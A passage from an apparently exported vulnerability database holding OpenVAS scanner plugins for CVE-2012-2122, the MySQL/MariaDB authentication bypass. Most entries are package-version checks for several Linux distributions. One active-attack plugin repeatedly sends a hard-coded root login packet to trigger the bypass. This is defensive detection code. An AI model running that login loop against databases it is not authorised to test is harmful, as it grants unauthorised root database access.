value:\"http://dev.mysql.com/doc/refman/5.5/en/news-5-5-24.html\");\n script_xref(name:\"URL\", value:\"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.63-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.24-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.63-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.63-0ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.96-0ubuntu3\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:56:18", "description": "Check for the Version of mysql", "cvss3": {}, "published": "2012-12-13T00:00:00", "type": "openvas", "title": "SuSE Update for mysql openSUSE-SU-2012:0860-1 (mysql)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2018-01-01T00:00:00", "id": "OPENVAS:850182", "href": "http://plugins.openvas.org/nasl.php?oid=850182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0860_1.nasl 8265 2018-01-01 06:29:23Z teissa $\n#\n# SuSE Update for mysql openSUSE-SU-2012:0860-1 (mysql)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mysql on openSUSE 12.1, openSUSE 11.4\";\ntag_insight = \"Fixing CVE-2012-2122: authentication bypass due to\n incorrect type casting\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850182);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:01:55 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-2122\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0860_1\");\n script_name(\"SuSE Update for mysql openSUSE-SU-2012:0860-1 (mysql)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysqlclusterclient16\", rpm:\"libmysqlclusterclient16~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysqlclusterclient16-debuginfo\", rpm:\"libmysqlclusterclient16-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysqlclusterclient_r16\", rpm:\"libmysqlclusterclient_r16~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysqlclusterclient_r16-debuginfo\", rpm:\"libmysqlclusterclient_r16-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster\", rpm:\"mysql-cluster~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-bench\", rpm:\"mysql-cluster-bench~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-bench-debuginfo\", rpm:\"mysql-cluster-bench-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-client\", rpm:\"mysql-cluster-client~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-client-debuginfo\", rpm:\"mysql-cluster-client-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-debug\", rpm:\"mysql-cluster-debug~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-debug-debuginfo\", rpm:\"mysql-cluster-debug-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-debuginfo\", rpm:\"mysql-cluster-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-debugsource\", rpm:\"mysql-cluster-debugsource~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-extra\", rpm:\"mysql-cluster-ndb-extra~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-extra-debuginfo\", rpm:\"mysql-cluster-ndb-extra-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-management\", rpm:\"mysql-cluster-ndb-management~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-management-debuginfo\", rpm:\"mysql-cluster-ndb-management-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-storage\", rpm:\"mysql-cluster-ndb-storage~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-storage-debuginfo\", rpm:\"mysql-cluster-ndb-storage-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-tools\", rpm:\"mysql-cluster-ndb-tools~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-tools-debuginfo\", rpm:\"mysql-cluster-ndb-tools-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-test\", rpm:\"mysql-cluster-test~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-test-debuginfo\", rpm:\"mysql-cluster-test-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-tools\", rpm:\"mysql-cluster-tools~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-tools-debuginfo\", rpm:\"mysql-cluster-tools-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysqlclusterclient16\", rpm:\"libmysqlclusterclient16~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysqlclusterclient16-debuginfo\", rpm:\"libmysqlclusterclient16-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysqlclusterclient_r16\", rpm:\"libmysqlclusterclient_r16~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysqlclusterclient_r16-debuginfo\", rpm:\"libmysqlclusterclient_r16-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster\", rpm:\"mysql-cluster~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-bench\", rpm:\"mysql-cluster-bench~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-bench-debuginfo\", rpm:\"mysql-cluster-bench-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-client\", rpm:\"mysql-cluster-client~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-client-debuginfo\", rpm:\"mysql-cluster-client-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-debug\", rpm:\"mysql-cluster-debug~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-debug-debuginfo\", rpm:\"mysql-cluster-debug-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-debuginfo\", rpm:\"mysql-cluster-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-debugsource\", rpm:\"mysql-cluster-debugsource~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-extra\", rpm:\"mysql-cluster-ndb-extra~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-extra-debuginfo\", rpm:\"mysql-cluster-ndb-extra-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-management\", rpm:\"mysql-cluster-ndb-management~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-management-debuginfo\", rpm:\"mysql-cluster-ndb-management-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-storage\", rpm:\"mysql-cluster-ndb-storage~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-storage-debuginfo\", rpm:\"mysql-cluster-ndb-storage-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-tools\", rpm:\"mysql-cluster-ndb-tools~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-ndb-tools-debuginfo\", rpm:\"mysql-cluster-ndb-tools-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-test\", rpm:\"mysql-cluster-test~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-test-debuginfo\", rpm:\"mysql-cluster-test-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-tools\", rpm:\"mysql-cluster-tools~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-cluster-tools-debuginfo\", rpm:\"mysql-cluster-tools-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-03T18:58:01", "description": "MySQL and MariaDB is prone to an Authentication Bypass.", "cvss3": {}, "published": "2012-06-11T00:00:00", "type": "openvas", "title": "MySQL / MariaDB Authentication Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2020-04-01T00:00:00", "id": "OPENVAS:1361412562310103492", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103492", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MySQL / MariaDB Authentication Bypass\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103492\");\n script_bugtraq_id(53911);\n script_cve_id(\"CVE-2012-2122\");\n script_version(\"2020-04-01T10:41:43+0000\");\n script_name(\"MySQL / MariaDB Authentication Bypass\");\n script_tag(name:\"last_modification\", value:\"2020-04-01 10:41:43 +0000 (Wed, 01 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-11 18:38:54 +0200 (Mon, 11 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_category(ACT_ATTACK);\n script_family(\"Databases\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"mysql_version.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL_MariaDB/installed\");\n\n script_xref(name:\"URL\", value:\"http://bugs.mysql.com/bug.php?id=64884\");\n script_xref(name:\"URL\", value:\"https://mariadb.atlassian.net/browse/MDEV-212\");\n script_xref(name:\"URL\", value:\"https://web.archive.org/web/20131027090831/http://www.h-online.com:80/open/news/item/Simple-authentication-bypass-for-MySQL-root-revealed-Update-1614990.html\");\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2012/q2/493\");\n\n script_tag(name:\"summary\", value:\"MySQL and MariaDB is prone to an Authentication Bypass.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will yield unauthorized access to the database.\");\n\n script_tag(name:\"affected\", value:\"All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.23 are\n vulnerable.\");\n\n script_tag(name:\"solution\", value:\"Update to:\n\n - MariaDB version 5.1.62, 5.2.12, 5.3.6, 5.5.23 or later\n\n - MySQL version 5.1.63, 5.5.24, 5.6.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"byte_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nset_byte_order(BYTE_ORDER_LITTLE_ENDIAN);\n\ncpe_list = make_list( \"cpe:/a:mysql:mysql\",\n \"cpe:/a:oracle:mysql\",\n \"cpe:/a:mariadb:mariadb\" );\n\nif( ! infos = get_app_port_from_list( cpe_list:cpe_list ) )\n exit( 0 );\n\nport = infos[\"port\"];\n\nif( get_kb_item( \"MySQL/\" + port + \"/blocked\" ) )\n exit( 0 );\n\ncpe = infos[\"cpe\"];\nif( ! vers = get_app_location( cpe:cpe, port:port ) )\n exit( 0 );\n\n# nb: The vulnerability exists only on specific builds and the original advisory says:\n# \"many MySQL/MariaDB builds are not affected by this bug.\"\n# \"As far as I know, official vendor MySQL and MariaDB binaries are not vulnerable.\"\n# Starting from year 2018 (6 years after the vuln) we're now only checking the mentioned\n# vulnerable versions to avoid the thousand failed logins in the for loop below...\nif( version_is_less( version:vers, test_version:\"5.1.63\" ) ||\n version_in_range( version:vers, test_version:\"5.2.0\", test_version2:\"5.2.11\" ) ||\n version_in_range( version:vers, test_version:\"5.3.0\", test_version2:\"5.3.5\" ) ||\n version_in_range( version:vers, test_version:\"5.5.0\", test_version2:\"5.2.23\" ) ) {\n\n sock = open_sock_tcp( port );\n if( ! sock )\n exit( 0 );\n\n res = recv( socket:sock, length:4 );\n if( ! res )\n exit( 0 );\n\n plen = ord( res[0] ) + ( ord( res[1] ) / 8 ) + ( ord( res[2] ) / 16 );\n res = recv( socket:sock, length:plen );\n\n req = raw_string( 0x50, 0x00, 0x00, 0x01, 0x05, 0xa6, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x01, 0x21, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x72, 0x6f, 0x6f, 0x74, 0x00, 0x14, 0x26, 0xcd, 0x8e, 0x6a, 0x43, 0x44,\n 0x61, 0x21, 0xe7, 0x96, 0x8b, 0x18, 0xc3, 0xdc, 0x55, 0xcc, 0x5d, 0xd6, 0xa3, 0xb0, 0x6d, 0x79,\n 0x73, 0x71, 0x6c, 0x5f, 0x6e, 0x61, 0x74, 0x69, 0x76, 0x65, 0x5f, 0x70, 0x61, 0x73, 0x73, 0x77,\n 0x6f, 0x72, 0x64, 0x00 );\n\n send( socket:sock,data:req );\n res = recv( socket:sock, length:4 );\n if( ! res || strlen( res ) < 4 ) {\n close( sock );\n exit( 0 );\n }\n\n plen = ord( res[0] ) + ( ord( res[1] ) / 8 ) + ( ord( res[2] ) / 16 );\n\n res = recv( socket:sock, length:plen );\n if( ! res || strlen( res ) < plen ) {\n close( sock );\n exit( 0 );\n }\n\n close( sock );\n\n errno = ord( res[2] ) << 8 | ord( res[1] );\n if( errno != 1045 )\n exit( 0 );\n\n for( i = 0; i < 1000; i++ ) {\n\n sock = open_sock_tcp( port );\n if( ! sock )\n continue;\n\n buf = recv( socket:sock, length:4 );\n if( strlen( buf ) < 4 ) {\n close( sock );\n continue;\n }\n\n plen = ord( buf[0] ) + ( ord( buf[1] ) / 8 ) + ( ord( buf[2] ) / 16 );\n buf = recv( socket:sock, length:plen );\n\n if( strlen( buf ) < plen ) {\n close( sock );\n continue;\n }\n\n send( socket:sock, data:req );\n recv = recv( socket:sock, length:4 );\n\n if( strlen( recv ) < 4 ) {\n close( sock );\n continue;\n }\n\n blen = ord( recv[0] ) + ( ord( recv[1] ) / 8 ) + ( ord( recv[2] ) / 16 );\n recv = recv( socket:sock, length:blen );\n\n if( strlen( recv ) < blen ) {\n close( sock );\n continue;\n }\n\n errno = ord( recv[2] ) << 8 | ord( recv[1] );\n if( errno == 0 && ( ord( recv[0] ) == 0 && ord( recv[3] ) == 2 && ord( recv[4] ) == 0 ) ) {\n security_message( port:port );\n close( sock );\n exit( 0 );\n }\n close( sock );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:58:05", "description": "Check for the Version of mysql", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for mysql FEDORA-2012-9308", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2018-01-01T00:00:00", "id": "OPENVAS:864474", "href": "http://plugins.openvas.org/nasl.php?oid=864474", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mysql FEDORA-2012-9308\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mysql on Fedora 17\";\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. MySQL is a\n client/server implementation consisting of a server daemon (mysqld)\n and many different client programs and libraries. The base package\n contains the standard MySQL client programs and generic MySQL files.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082421.html\");\n script_id(864474);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 09:40:44 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-2122\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9308\");\n script_name(\"Fedora Update for mysql FEDORA-2012-9308\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.5.24~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:57:10", "description": "Check for the Version of mysql", "cvss3": {}, "published": "2012-06-28T00:00:00", "type": "openvas", "title": "Fedora Update for mysql FEDORA-2012-9324", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:864504", "href": "http://plugins.openvas.org/nasl.php?oid=864504", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mysql FEDORA-2012-9324\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mysql on Fedora 16\";\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. MySQL is a\n client/server implementation consisting of a server daemon (mysqld)\n and many different client programs and libraries. The base package\n contains the standard MySQL client programs and generic MySQL files.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082877.html\");\n script_id(864504);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 